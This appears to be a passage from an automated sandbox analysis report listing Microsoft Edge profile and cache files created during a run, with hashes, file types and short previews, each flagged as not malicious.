                                                                                                                                                            Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\becc17c5-8846-48f5-b68b-4140a6413612.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):115717
                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d3836f76-cd82-4a53-b4c7-899ad983ee17.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (18208), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):18210
                                                                                                                                                            Entropy (8bit):5.455732884107002
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:sVmoJ9pQTryZiuaba4uypnNJk3SewAYjY5pEwqi5WcHbbK8Gpj+FeJYQwHtvDdld:sV7LAJu4NJk3nu3yWeepUjQwVDx
                                                                                                                                                            MD5:C602501DC45B81AB88695A49C98CD6C5
                                                                                                                                                            SHA1:0E73B87254B5142D23F3AD5E66777B311F99CF0E
                                                                                                                                                            SHA-256:0A398520872B8DD3845CCD0EB5DE641ABA8AE9507F2E944D4C4405A36CA8CFCB
                                                                                                                                                            SHA-512:5E2F24CFFB878C5AB145510F36F53051D2A716FD581C881386989A1C00E4C41D73F4B4942F6A81C1A2FA24AA6C9160F9C870B42C571E07CA90D3ED036204893D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380674698994767","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28672
                                                                                                                                                            Entropy (8bit):0.3410017321959524
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                            MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                            SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                            SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                            SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16384
                                                                                                                                                            Entropy (8bit):0.35226517389931394
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
                                                                                                                                                            MD5:D2CCDC36225684AAE8FA563AFEDB14E7
                                                                                                                                                            SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
                                                                                                                                                            SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
                                                                                                                                                            SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):32768
                                                                                                                                                            Entropy (8bit):0.08726716274348083
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:btPtB2lQEtPtB2lXzFnnnnnnnnnnnpwE:pVB2isVB2Xnnnnnnnnnnnu
                                                                                                                                                            MD5:C6E3695A003980315433C420DBFC5162
                                                                                                                                                            SHA1:BD1C5C2585751DEB3602A8A3EE38E777ADEAE5B6
                                                                                                                                                            SHA-256:E64696785F84DA5A8FAE37DED1E90183FF6462A1FD133B1C69412079D51A2D45
                                                                                                                                                            SHA-512:1C7EA31A789F4249C60C4CFAECD407F03011AB8E162C7D79B1DB719FA1195EAC29B76B2C57150B7FED1A3BF309E0AFB4148A1E418DA50C75CB1406EFF6854F5A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..-.............<......._A..^...S.2..kBq.!.;...'..-.............<......._A..^...S.2..kBq.!.;...'........8...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):247232
                                                                                                                                                            Entropy (8bit):0.8301648674805258
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:T7Y9zlLm2wXpitj5BPtI/B181QAv8zNy/y2nygyP9y3xyFQ:3/e7
                                                                                                                                                            MD5:CC34F2167C96705A30E123094D82721B
                                                                                                                                                            SHA1:6B759EF875AA3512DA04A14F6ACF58E752D1F1FA
                                                                                                                                                            SHA-256:50B93EB8E493BB316FC797FDF2F62164518066D45BEC309B498CE42A53AB3D26
                                                                                                                                                            SHA-512:BAD8510C2C8A0F472A1BADFA77573DB51B58C53474428A9FAD8F8F37A90139C716D736855B7A6CC8B84C1019E08E04029BDAE46DC8ABB016D69BF3AA5AF2993E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:7....-..........S.2..kBq...f.D..........S.2..kBq.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):190
                                                                                                                                                            Entropy (8bit):4.610513803063863
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:VVXntjQ28l/1r6P/FDdllhUHBFOR3tS/l3seGKT9rcQ6x88rOtlTxotl:/XnthC9illhUHBqil3sedhO88rOu
                                                                                                                                                            MD5:3A981A6F2907F05813B06EC4BBA6137F
                                                                                                                                                            SHA1:7CA3CEDA8BF9D1E2FB96B6C26D5170C3043FC3BB
                                                                                                                                                            SHA-256:03E81BCAAC63F68B12BF51C2314ED518B067F6A72F5E9E332E240CCF7579A6ED
                                                                                                                                                            SHA-512:6D15C9EE5C5BF88EED47CC32C6BF1680DA17F4A791BFBEE2ECD0EE602D722B03469911CC9CBCC7A59FB426F4C123DD231458849F6DD3FE51F5749BBB87A1104D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:A..r.................20_1_1...1.`e;...............#38_h.......6.Z..W.F.........................Q..0................39_config..........6.....n ...1u}.=...............u}.=...............

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):281
                                                                                                                                                            Entropy (8bit):5.251925750340289
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/X1wkn23oH+Tcwtfrl2KLl9b+q2Pwkn23oH+TcwtfrK+IFUv:7/WfYeb1Lzb+vYfYeb23FUv
                                                                                                                                                            MD5:1493066B15790A51FDA0AB2A19F857CA
                                                                                                                                                            SHA1:6BF3470F331044C1F8257300D6F58EE6931E4C1C
                                                                                                                                                            SHA-256:8324FBFAF57E41AEDB07A45FAA26ED25AD64DF37BA112B68CAE5203388F88188
                                                                                                                                                            SHA-512:B3E686B1B7FF49A7D4B81F62D145E9F1A5E12781C28C008707BBC11F2EF7057D8427BA315A4698FC41A3F3F247049441398A21F15D7A3AD1BB1A20F113B70DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.484 17dc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db since it was missing..2025/01/06-17:04:59.499 17dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):617
                                                                                                                                                            Entropy (8bit):3.949047921959319
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:G0nYEQeeetU3p/Uz0RuWlJhC+lvBavRtin01zv0:G0nYEQR3RUovhC+lvBOL0
                                                                                                                                                            MD5:EE5B47D224FE27A05467689F5B0678FA
                                                                                                                                                            SHA1:35341CA4CC493FFC4939EB3D7D8E178D7D5028F9
                                                                                                                                                            SHA-256:779E99DFF510FCAA7E0BBE155D9C33ABE7D6B82EEB40B91097E0E54499F06211
                                                                                                                                                            SHA-512:CFD7F227195E51CC93DED600CDC5FDDD8689C924070F9F1E68CAD19EDB7937EACFBA00BA533A7592AA7664D749C756DA1A9A97EDD72EA6EF900782A968D944DE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.h.6.................__global... .t...................__global... ..'i..................21_.....B....................33_......-.t.................21_......'..................33_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.|.................9_.....'\c..................9_.....

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):299
                                                                                                                                                            Entropy (8bit):5.174957765917191
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/Xb1wkn23oH+Tcwtfrzs52KLl9adc+q2Pwkn23oH+TcwtfrzAdIFUv:7/X6fYebs9Lzadc+vYfYeb9FUv
                                                                                                                                                            MD5:8994746976A050B7CCC65F7250BF09C3
                                                                                                                                                            SHA1:19A2DCB576892224E16E3BF0427324BA024DB273
                                                                                                                                                            SHA-256:0EF25777AE113B81ABF6913B266A460DA7319F4F21051D425E21C9B82FE3342D
                                                                                                                                                            SHA-512:9A96D99AA66275779FAFE0C824BACAB75C8ABCB138B5ED1404E9004B8A04D9966A1715A55BF2A6B5EF499231B60C75141E1D9D5B4BF508A3A8E1F06BAB8A154B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.022 17dc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata since it was missing..2025/01/06-17:04:59.071 17dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):41
                                                                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):262512
                                                                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:LsNlL3/Sl:Ls3
                                                                                                                                                            MD5:C35AC8F0B79981E91ACAB3CE17C3AA63
                                                                                                                                                            SHA1:5B21EF473AA02D09947F0FA095C15857DFC5AAEA
                                                                                                                                                            SHA-256:677885E652561828FB52FFAFFCF865E772FAB957876CFC0CBB2090E476355873
                                                                                                                                                            SHA-512:B4CD706686805F232CB3D9CD743B257880D8342BA83ED42D8BF22D06A893CD62FCCCA46F2088AEE8D145F03741D1908F91FC44CF7493B2750BFEC2363C669A32
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................L.R.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8192
                                                                                                                                                            Entropy (8bit):0.01057775872642915
